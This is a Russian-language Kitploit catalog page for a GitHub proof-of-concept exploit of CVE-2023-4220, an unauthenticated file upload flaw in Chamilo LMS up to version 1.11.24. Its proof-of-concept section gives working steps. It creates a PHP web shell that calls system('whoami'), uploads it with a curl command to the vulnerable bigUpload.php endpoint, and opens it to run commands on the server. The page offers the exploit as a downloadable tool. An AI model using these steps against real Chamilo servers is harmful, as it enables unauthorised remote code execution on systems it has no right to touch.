Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220 — Неограниченная загрузка файлов в функциональности загрузки больших файлов в `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять сохранённые XSS-атаки и получать удалённое выполнение кода посредством загрузки веб-шелла. | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubdollarboysushil/chamilo-lms-unauthenticated-file-upload-cve-2023-4220

Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
РепозиторийСайт
12 лет назадЕщё не проверено

Описание

Неограниченная загрузка файлов в функциональности загрузки больших файлов в `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять сохранённые XSS-атаки и получать удалённое выполнение кода посредством загрузки веб-шелла.

Поделиться

Chamilo-LMS-Unauthenticated-File-Upload-

Неограниченная загрузка файлов в механизме большой загрузки файлов /main/inc/lib/javascript/bigupload/inc/bigUpload.php в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять хранимые XSS-атаки и получать удаленное выполнение кода посредством загрузки веб-шелла.

Затронутая версия ≤v1.11.24

Идентификатор CVE CVE-2023-4220

Сводка уязвимости

Функциональность большой загрузки файлов через /main/inc/lib/javascript/bigupload/inc/bigUpload.php позволяет загружать произвольные файлы в каталог /main/inc/lib/javascript/bigupload/files в пределах корневого каталога веб-сервера.

Доказательство концепции

  • Если каталог /main/inc/lib/javascript/bigupload/files существует, мы можем загрузить произвольный файл следующим образом;

  • Создайте вредоносный PHP-файл echo '<?php system("whoami"); ?>' > dollarboysushil.php Untitled (1).png

  • Затем мы можем загрузить этот файл, выполнив следующую команду:

    root@kitploit:~
    `$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'` 
    

    Untitled (1).png

  • Мы можем проверить, что наш файл загружен, посетив каталог /main/inc/lib/javascript/bigupload/files Untitled (1).png

  • И мы можем выполнить его, нажав на PHP-файл, что даст вывод команды whoami Untitled (1).png

Скачать инструмент